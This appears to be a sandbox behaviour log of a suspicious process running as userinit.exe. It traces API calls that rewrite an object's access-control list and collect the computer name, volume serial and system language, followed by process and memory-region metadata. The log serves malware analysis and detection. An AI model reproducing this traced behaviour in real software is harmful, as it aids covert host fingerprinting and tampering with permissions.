[0130.680] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29cff60, pSourceSid=0xe0f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x29cff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.680] IsValidSid (pSid=0x29cff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.680] ConvertSidToStringSidA () returned 0x1
[0130.680] LocalFree (hMem=0xe7018) returned 0x0
[0130.680] GetAce (in: pAcl=0xe0f3c, dwAceIndex=0x2, pAce=0x8e8b4 | out: pAce=0x8e8b4*=0xe0f70) returned 1
[0130.680] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x29c29c0, pSourceSid=0xe0f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x29c29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0130.680] IsValidSid (pSid=0x29c29c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0130.680] ConvertSidToStringSidA () returned 0x1
[0130.680] LocalFree (hMem=0xe7018) returned 0x0
[0130.680] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.680] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0130.680] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0xe0f28, lpbSaclPresent=0x8ea24, pSacl=0x8ea18, lpbSaclDefaulted=0x8ea1c | out: lpbSaclPresent=0x8ea24, pSacl=0x8ea18, lpbSaclDefaulted=0x8ea1c) returned 1
[0130.680] LocalFree (hMem=0xe0f28) returned 0x0
[0130.680] IsValidSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.680] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.680] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0130.680] GetLengthSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0130.680] GetLastError () returned 0x0
[0130.680] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.680] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0130.681] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.681] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0130.681] InitializeAcl (in: pAcl=0xe7fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0xe7fa8) returned 1
[0130.681] IsValidSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.681] GetLengthSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0130.681] GetLastError () returned 0x0
[0130.681] IsValidSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.681] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.681] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0130.681] SetLastError (dwErrCode=0x0)
[0130.681] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.681] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0130.681] GetSidSubAuthorityCount (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x29cf615
[0130.681] GetLastError () returned 0x0
[0130.681] IsValidSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.681] SetLastError (dwErrCode=0x0)
[0130.681] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.682] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0130.682] GetSidIdentifierAuthority (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x29cf616
[0130.682] GetLastError () returned 0x0
[0130.682] IsValidSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.682] IsValidSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.682] SetLastError (dwErrCode=0x0)
[0130.682] GetSidSubAuthorityCount (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x29cf615
[0130.682] GetLastError () returned 0x0
[0130.682] SetLastError (dwErrCode=0x0)
[0130.682] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.682] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0130.682] GetSidSubAuthority (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x29cf61c
[0130.682] GetLastError () returned 0x0
[0130.682] IsValidSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0130.682] GetLengthSid (pSid=0x29cf614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0130.682] GetLastError () returned 0x0
[0130.682] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.682] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0130.682] AddAce (in: pAcl=0xe7fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0xd2f90, nAceListLength=0x14 | out: pAcl=0xe7fa8) returned 1
[0130.682] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0130.683] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0130.683] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0130.683] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0130.683] SetSecurityInfo () returned 0x0
[0130.683] CloseHandle (hObject=0x1d0) returned 1
[0130.683] GetComputerNameA (in: lpBuffer=0x29cfd84, nSize=0x8ecec | out: lpBuffer="CRH2YWU7", nSize=0x8ecec) returned 1
[0130.683] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.683] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.684] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebe0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.684] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.684] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebe0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.684] VirtualAlloc (lpAddress=0x29d0000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x29d0000
[0130.684] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.685] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.685] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.685] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.685] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.685] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.685] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.685] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.685] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.686] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.686] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.686] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.686] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.686] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.686] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.686] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.687] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x8ecd4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x8ece8, lpMaximumComponentLength=0x8ece4, lpFileSystemFlags=0x8ece0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x8ece8*=0x90c08a66, lpMaximumComponentLength=0x8ece4*=0xff, lpFileSystemFlags=0x8ece0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0130.687] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x8ebd8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0130.687] GetSystemDefaultLangID () returned 0xc0409
[0130.687] VerLanguageNameA (in: wLang=0x409, szLang=0x8ec8c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0130.688] ExitProcess (uExitCode=0x0)
Thread:
id = 261
os_tid = 0x7d8
Thread:
id = 262
os_tid = 0x264
Process:
id = "38"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be7c0"
os_pid = "0x8a4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4225
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4226
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4227
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4228
start_va = 0x150000
end_va = 0x18ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 4229
start_va = 0x200000
end_va = 0x208fff
entry_point = 0x200000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 4230
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 4231
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4232
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4233
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 4234
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 4235
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 4236
start_va = 0x5a0000
end_va = 0x69ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 4237
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4238
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4239
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4240
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4241
start_va = 0x340000
end_va = 0x34ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000340000"
filename = ""
Region:
id = 4242
start_va = 0x6d7b0000
end_va = 0x6d833fff
entry_point = 0x6d7b0000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 4243
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 4244
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4245
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4246
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4247
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4248
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4249
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4250
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4251
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4252
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4253
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4254
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 4255
start_va = 0x210000
end_va = 0x2d7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000210000"
filename = ""
Region:
id = 4256
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4257
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4258
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4259
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4260
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 4261
start_va = 0x6a0000
end_va = 0x129ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006a0000"
filename = ""
Region:
id = 4262
start_va = 0x1410000
end_va = 0x141ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 4263
start_va = 0x12a0000
end_va = 0x139ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000012a0000"
filename = ""
Region:
id = 4264
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4265
start_va = 0x1420000
end_va = 0x15affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001420000"
filename = ""
Region:
id = 4266
start_va = 0x1420000
end_va = 0x14fefff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001420000"
filename = ""
Region:
id = 4267
start_va = 0x1570000
end_va = 0x15affff
entry_point = 0x0
region_type = private
name = "private_0x0000000001570000"
filename = ""
Region:
id = 4268
start_va = 0xd0000
end_va = 0xd0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 4269
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 4270
start_va = 0x15b0000
end_va = 0x174ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000015b0000"
filename = ""
Region:
id = 4271
start_va = 0x1750000
end_va = 0x207ffff
entry_point = 0x1750000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 4272
start_va = 0xe0000
end_va = 0xe6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 4273
start_va = 0xf0000
end_va = 0xf1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000f0000"
filename = ""
Region:
id = 4274
start_va = 0x2080000
end_va = 0x2472fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002080000"
filename = ""
Region:
id = 4275
start_va = 0x350000
end_va = 0x3cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000350000"
filename = ""
Region:
id = 4276
start_va = 0x15b0000
end_va = 0x16bcfff
entry_point = 0x0
region_type = private
name = "private_0x00000000015b0000"
filename = ""
Region:
id = 4277
start_va = 0x1710000
end_va = 0x174ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001710000"
filename = ""
Region:
id = 4278
start_va = 0x2480000
end_va = 0x257ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002480000"
filename = ""
Region:
id = 4279
start_va = 0x2580000
end_va = 0x277ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002580000"
filename = ""
Region:
id = 4280
start_va = 0x2780000
end_va = 0x2800fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 4281
